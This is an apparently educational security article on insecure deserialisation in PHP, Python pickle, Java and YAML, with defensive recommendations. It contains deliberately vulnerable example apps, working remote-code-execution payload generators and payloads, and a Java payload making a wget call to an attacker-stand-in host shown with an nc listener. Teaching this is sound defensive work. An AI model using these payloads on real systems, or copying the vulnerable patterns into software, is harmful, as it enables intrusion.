Insecure Deserialisation

Deserialisation of untrusted data is ranked 8th in the 2017 OWASP Top Ten list of the most critical security risks to web applications. This vulnerability is identified as CWE-502, and occurs when the application deserialises data from an untrusted source without proper validation. Deserialisation mechanisms are often exploited by attackers to gain remote code execution in the compromised system.

In this article, we will analyse the most common cases of insecure deserialisation and examples of its exploitation. We will also give recommendations on how to address such threats.

Introduction

What does deserialisation mean?

Serialisation is the process of converting structures and objects specific to a programming language into a single format, usually a string or a byte sequence.

Deserialisation is the reverse process: restoring structures and objects from a serialised string or byte sequence.
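
As a minimal sketch of this round trip, the snippet below serialises the same value once to a string (JSON) and once to a byte sequence (pickle), then restores it. The state dictionary is a made-up example and does not come from any real application.

```python
import json
import pickle

# Hypothetical program state, used only for illustration.
state = {"user": "alice", "cart": [1, 2, 3], "total": 9.5}

# Serialise to a text format (JSON string) and to a byte sequence (pickle).
as_text = json.dumps(state)
as_bytes = pickle.dumps(state)

# Deserialise: both calls rebuild an object equal to the original.
from_text = json.loads(as_text)
from_bytes = pickle.loads(as_bytes)

print(type(as_text).__name__, type(as_bytes).__name__)
print(from_text == state, from_bytes == state)
```

Deserialising here is safe only because the data was produced by the same program a moment earlier.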

Serialisation and deserialisation are often used to save the program’s current state, for instance, on a hard drive or in a database, and to exchange data between various applications. Modern programming languages provide convenient mechanisms to serialise and deserialise their structures. They are favoured by developers for being easy and quick tools, which do not require any additional libraries and save users the trouble of handling incompatible serialised data.

However, serialisation and deserialisation mechanisms can do far more than represent objects in a single format. Unfortunately, many developers do not give these mechanisms due consideration, which results in programming errors and, consequently, in serious application security problems.

Deserialisation in PHP

PHP implements serialisation and deserialisation through the built-in serialize() and unserialize() functions, respectively.

The serialize() function takes a value (for example, an object) as a parameter and returns its serialised representation as a string.

The unserialize() function takes a string that contains a serialised object as a parameter and returns the object restored from this string.

Let us consider a simple example.

<?php 
    class Injection{
        public $some_data;
        function __wakeup(){
            if(isset($this->some_data)){
                eval($this->some_data);
            }
        }
    }

    if(isset($_REQUEST['data'])){
        $result = unserialize($_REQUEST['data']);
        
        // do something with $result object
        // ...
    }
?>

In this example, the Injection class implements the __wakeup() magic method. PHP calls this method automatically as soon as an Injection object is deserialised, and, as illustrated, it executes the code stored in the $some_data property.

Using the code below, we will generate the payload to exploit this type of structure.

<?php
    class Injection{
        public $some_data;
        function __wakeup(){
            if(isset($this->some_data)){
                eval($this->some_data);
            }
        }
    }
    
    $inj = new Injection();
    $inj->some_data = "phpinfo();";
    echo(serialize($inj));
?>

As a result of code execution, we get a serialised object as follows:

 O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
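
The format is simple enough to build by hand. The Python sketch below reproduces the string above. The php_serialize_object helper is a hypothetical name introduced for illustration, and it assumes an object with public string properties only (private and protected properties are encoded differently).

```python
def php_serialize_object(class_name, properties):
    """Build PHP's serialised form for an object with public string properties."""

    def php_string(value):
        # PHP prefixes every string with its length in bytes, not characters.
        return 's:{}:"{}";'.format(len(value.encode("utf-8")), value)

    body = "".join(php_string(k) + php_string(v) for k, v in properties.items())
    # O:<class name length>:"<class name>":<property count>:{<properties>}
    return 'O:{}:"{}":{}:{{{}}}'.format(
        len(class_name.encode("utf-8")), class_name, len(properties), body
    )


payload = php_serialize_object("Injection", {"some_data": "phpinfo();"})
print(payload)
```

Because the lengths are stored explicitly, an attacker who changes the value of some_data must also update the length prefix, otherwise unserialize() rejects the string.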

Now let us pass this serialised object to our vulnerable application in the data parameter.

 https://example.com/vulnerable.php?data=O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}

When the application deserialises the injected object, the __wakeup() method runs and calls the built-in phpinfo() function. In the same way, an attacker can execute arbitrary code remotely on the vulnerable system.

It should be noted, however, that exploitation of insecure deserialisation in PHP does not always lead to remote code execution. It may instead result in the reading or writing of arbitrary files, SQL injection, denial of service, etc.

For a successful attack, the target application must contain classes that implement suitable magic methods. Generally, the most useful methods for this purpose are __destruct(), __wakeup() and __toString(). Furthermore, to identify a vulnerable class or a chain of classes (the so-called 'gadget'), the attacker usually needs access to the source code.

However, applications are often built on popular frameworks and libraries that already contain the necessary gadgets. In this case, the payload can be generated with the help of the PHPGGC utility.

Deserialisation in Python

Python and PHP have very similar serialisation and deserialisation mechanisms. In Python, these processes are implemented through the built-in pickle module.

pickle.dump() takes an object and a file object opened for binary writing as parameters and writes the serialised version of the object to that file.

pickle.load() takes a file object opened for binary reading that contains a serialised object as a parameter and returns the deserialised object.

pickle.dumps() takes an object as a parameter and returns its serialised representation as a byte string.

pickle.loads() takes a byte string that contains a serialised object as a parameter and returns a deserialised object restored from this string.
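
The four functions can be tried side by side. In this small sketch, io.BytesIO stands in for a real file opened in binary mode, and the record dictionary is made-up data.

```python
import io
import pickle

record = {"id": 7, "tags": ["a", "b"]}  # illustrative data

# dump()/load() operate on a binary file object; BytesIO stands in for
# a file opened with open(path, "wb") or open(path, "rb").
buffer = io.BytesIO()
pickle.dump(record, buffer)
buffer.seek(0)  # rewind before reading back
from_file = pickle.load(buffer)

# dumps()/loads() work on bytes objects directly.
blob = pickle.dumps(record)
from_bytes = pickle.loads(blob)

print(from_file == record, from_bytes == record)
```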

Let us give a simple example.

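import pickle
from urllib.parse import unquote_to_bytes

from flask import Flask, request

app = Flask(__name__)

@app.route('/vulnerable.py', methods=['GET'])
def parse_request():
    # Pickle data is binary, so read the raw query string and
    # percent-decode it to bytes instead of using request.args
    query = request.query_string
    if query.startswith(b'data='):
        data = unquote_to_bytes(query[len(b'data='):])
        result = pickle.loads(data)  # unsafe: data is attacker-controlled
        # do something with result object
        # ...
    return ''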

Using the code below, we will generate the payload to exploit this type of structure.

import pickle

class Payload(object):
    def __reduce__(self):
        return (exec, ('import os;os.system("ls")', ))
        
pickle_data = pickle.dumps(Payload())

print(pickle_data)

As a result of code execution, we get a serialised object as follows:

 b'\x80\x03cbuiltins\nexec\nq\x00X\x19\x00\x00\x00import os;os.system("ls")q\x01\x85q\x02Rq\x03.'

Now let us pass this serialised and URL-encoded object to our vulnerable application in the data parameter:

https://example.com/vulnerable.py?data=%80%03cbuiltins%0Aexec%0Aq%00X%19%00%00%00import%20os%3Bos.system%28%22ls%22%29q%01%85q%02Rq%03.
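
The query value above can be derived from the pickle bytes with the standard library. The sketch below copies the byte string from the earlier output and only encodes and decodes it; it never unpickles it.

```python
from urllib.parse import quote, unquote_to_bytes

# Pickle bytes copied from the output shown earlier in this section.
pickle_data = (b'\x80\x03cbuiltins\nexec\nq\x00X\x19\x00\x00\x00'
               b'import os;os.system("ls")q\x01\x85q\x02Rq\x03.')

# quote() accepts bytes and percent-encodes everything except
# letters, digits and a few safe punctuation characters.
encoded = quote(pickle_data)
print(encoded)

# Decoding to bytes (not to text) restores the payload exactly.
decoded = unquote_to_bytes(encoded)
print(decoded == pickle_data)
```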

When the application deserialises the object, os.system() is called with the ls argument and lists the files in the application's current working directory. In the same way, an attacker can execute arbitrary commands on the vulnerable system remotely.

In the case of Python, no additional conditions are required for a successful attack. Therefore, to be on the safe side, avoid using pickle.loads() to deserialise untrusted data.
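
Where pickle cannot be avoided, the attack surface can at least be narrowed by overriding Unpickler.find_class() so that only an explicit allowlist of globals can be resolved. The following is a sketch of that idea, not a complete defence. The SAFE_BUILTINS set, the RestrictedUnpickler and Evil classes and the restricted_loads helper are names chosen for illustration, and the demo payload uses the harmless eval("1 + 1") instead of a shell command.

```python
import builtins
import io
import pickle

# Illustrative allowlist: the only globals a pickle may reference.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks for a global object.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '{}.{}' is forbidden".format(module, name)
        )


def restricted_loads(data):
    """Drop-in analogue of pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Evil:
    def __reduce__(self):
        # Harmless stand-in for a real payload such as os.system(...).
        return (eval, ("1 + 1",))


print(restricted_loads(pickle.dumps([1, 2, range(3)])))
try:
    restricted_loads(pickle.dumps(Evil()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

The allowlist has to stay small: any permitted callable that can reach the file system or the interpreter reopens the hole.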

Deserialisation in Java

Deserialisation in Java is similar to the PHP and Python processes.

Usually, the following methods are employed:

readObject() method of the java.beans.XMLDecoder class
fromXML() method of the com.thoughtworks.xstream.XStream class
readObject() and readUnshared() methods of the java.io.ObjectInputStream class, which in turn invoke the readObject(), readObjectNoData(), readResolve() and readExternal() methods defined by the classes being deserialised

Let us illustrate the use of the readObject() method of the java.io.ObjectInputStream class drawing on a simple example:

import java.util.*;
import java.io.*;

class Injection implements Serializable
{
  public String some_data;

  private void readObject(ObjectInputStream in)
  {
    try
    {
      in.defaultReadObject();
      Runtime.getRuntime().exec(some_data);
    }
    
    catch (Exception e)
    {
      System.out.println("Exception: " + e.toString());
    }
  }
}

public class Main
{
  public static void main(String[] args)
  {
    Object obj = new Object ();

    try
    {
      String inputStr = args[0];
      byte[] decoded = Base64.getDecoder().decode(inputStr.getBytes("UTF-8"));
      ByteArrayInputStream bis = new ByteArrayInputStream(decoded);
      ObjectInput in = new ObjectInputStream(bis);
      obj = in.readObject();
      
      // do something with result object
      // ...
    }
    
    catch (Exception e)
    {
      System.out.println("Exception: " + e.toString ());
    }
  }
}

Using the code below, we will generate the payload to exploit this type of structure.

import java.util.*;
import java.io.*;

class Injection implements Serializable
{
  public String some_data;
}

public class Main
{
  public static void main(String[] args)
  {
    try
    {
      Injection inj = new Injection();
      inj.some_data = "wget http://example.com:8080";

      ByteArrayOutputStream baos = new ByteArrayOutputStream();
      ObjectOutputStream oos = new ObjectOutputStream(baos);
      oos.writeObject(inj);
      oos.close();
      
      System.out.println(new String(baos.toByteArray()));
      System.out.println(Base64.getEncoder().encodeToString(baos.toByteArray()));
    }
    
    catch (Exception e)
    {
      System.out.println ("Exception: " + e.toString ());
    }
  }
}

As a result of code execution, we get a serialised object as follows:

 ��sr Injection��+r7�L some_datatLjava/lang/String;xptwget http://example.com:8080

And, for the convenient interaction with binary data, the same object represented in the base64-encoded format:

 rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==

Let us transfer this serialised and base64-encoded object to our vulnerable application as an input parameter.

 java -jar vulnerable.jar rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==

When the application deserialises the object, Runtime.getRuntime().exec() is called with the wget http://example.com:8080 argument. This is confirmed by the incoming request on the attacker-controlled server example.com:

root@example.com:~$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [***.***.***.***] from (UNKNOWN) [***.***.***.***] 45430
GET / HTTP/1.1
User-Agent: Wget/1.15 (linux-gnu)
Accept: */*
Host: example.com:8080
Connection: Keep-Alive

This is how the attacker is able to perform remote code execution in the vulnerable system.

As in PHP, remote code execution in Java requires the application to contain a suitable class that implements the Serializable interface. In our example, this is the Injection class. Again, it is very difficult to find a suitable gadget without access to the source code. Where the application uses common frameworks and class libraries, the payload can be generated with the help of the ysoserial utility.
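
Java serialisation streams are easy to recognise in traffic or logs: they start with the magic bytes 0xACED followed by the version 0x0005, which is why the base64 payload shown earlier in this section begins with rO0AB. The Python sketch below checks for that header. The looks_like_java_serialised function is a hypothetical helper, and a match only indicates that the data deserves a closer look.

```python
import base64

# STREAM_MAGIC (0xACED) followed by STREAM_VERSION (0x0005).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"


def looks_like_java_serialised(b64_text):
    """Return True if the base64 text decodes to a Java serialisation stream."""
    try:
        raw = base64.b64decode(b64_text, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return False
    return raw.startswith(JAVA_STREAM_MAGIC)


# Payload copied from the example in this section.
article_payload = (
    "rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xh"
    "bmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA=="
)

print(looks_like_java_serialised(article_payload))
print(looks_like_java_serialised(base64.b64encode(b"hello").decode("ascii")))
```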

YAML Deserialisation

There is a variety of languages and frameworks that enable remote code execution during the course of YAML deserialisation.

For example, executing the following code in Python will output a listing of the current directory:

import yaml

yaml.load("!!python/object/new:os.system [ls -la]", Loader=yaml.UnsafeLoader)

This is quite a widespread problem. However, this article does not provide examples for other languages, since YAML processing is implemented differently in each of them.

As you can see from the code snippet above, the Loader=yaml.UnsafeLoader argument was passed explicitly when calling the yaml.load() function. This is important: recent versions of the library no longer allow unsafe loading by default.

Thus, calling yaml.load() without the Loader argument produces a warning in PyYAML 5.x, and fails outright from PyYAML 6.0 onwards, where the argument is mandatory:

main.py:3: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.

In earlier versions, however, the yaml.load() function placed no restrictions on the construction of arbitrary Python objects. Therefore, the yaml.safe_load() function had to be used for secure deserialisation of untrusted YAML. You can still come across this vulnerability in many applications that use earlier library versions to work with YAML.

Given the above, we recommend explicitly using safe functions such as yaml.safe_load(), rather than relying on the foresight of the library vendor.

Conclusion

Serialisation and deserialisation are indeed powerful and flexible tools. They provide developers with a convenient way to manipulate, transmit and save data on hard drives or in databases. However, like any other tools, they should be used correctly and with security precautions in mind.

Let’s face it, there is no simple and universal method to protect an application from deserialisation attacks (except maybe not using this mechanism). You are therefore encouraged to follow our recommendations for the safe use of deserialisation:

Apply secure deserialisation methods where possible, e.g. yaml.safe_load() instead of yaml.load().
Use simpler formats, e.g. JSON, to transmit and save data on the hard drive or in the database. While generally having less functionality, they do not carry such serious threats as embedded serialisation mechanisms.
Keep a whitelist of allowed classes. The developer may redefine the standard deserialisation functionality, and check whether the object being uploaded is allowed to be deserialised and whether the structures used in the serialised object are secure.
Sign transmitted serialised data. This is a good option for network data exchange between applications. Without knowing the secret key, which is used to sign the transmitted data, the attacker will not be able to make any modifications. However, it should be noted that the application or the secret key may be compromised in a different way, which may have an adverse impact on the security of related applications.
Use third-party libraries and frameworks specifically designed to improve the security of deserialisation processes (e.g. SerialKiller or NotSoSerial for Java).
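
Two of these recommendations, using a simpler format and signing the transmitted data, can be combined in a few lines. The Python sketch below serialises to JSON and protects the result with HMAC-SHA256. SECRET_KEY, sign() and verify_and_load() are hypothetical names, and key storage and rotation are out of scope here.

```python
import hashlib
import hmac
import json

SECRET_KEY = b"replace-with-a-random-secret"  # hypothetical key for the sketch


def sign(obj):
    """Serialise obj as JSON and prepend a hex HMAC-SHA256 tag."""
    body = json.dumps(obj, sort_keys=True).encode("utf-8")
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode("ascii")
    return tag + b"." + body


def verify_and_load(message):
    """Check the tag first; parse the body only if it is authentic."""
    tag, _, body = message.partition(b".")
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode("ascii")
    # compare_digest avoids leaking the match position through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch")
    return json.loads(body)


message = sign({"user": "alice", "role": "reader"})
print(verify_and_load(message))

tampered = message.replace(b"reader", b"admin")
try:
    verify_and_load(tampered)
except ValueError as exc:
    print("rejected:", exc)
```

The important design choice is the order of operations: the signature is verified before any parsing takes place, so unauthenticated bytes never reach the deserialiser.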

It is not always easy to adhere to these recommendations, especially where the developer has to maintain existing code. However, given that deserialisation attacks may lead to remote code execution and overall system compromise, the extra effort and time are fully justified.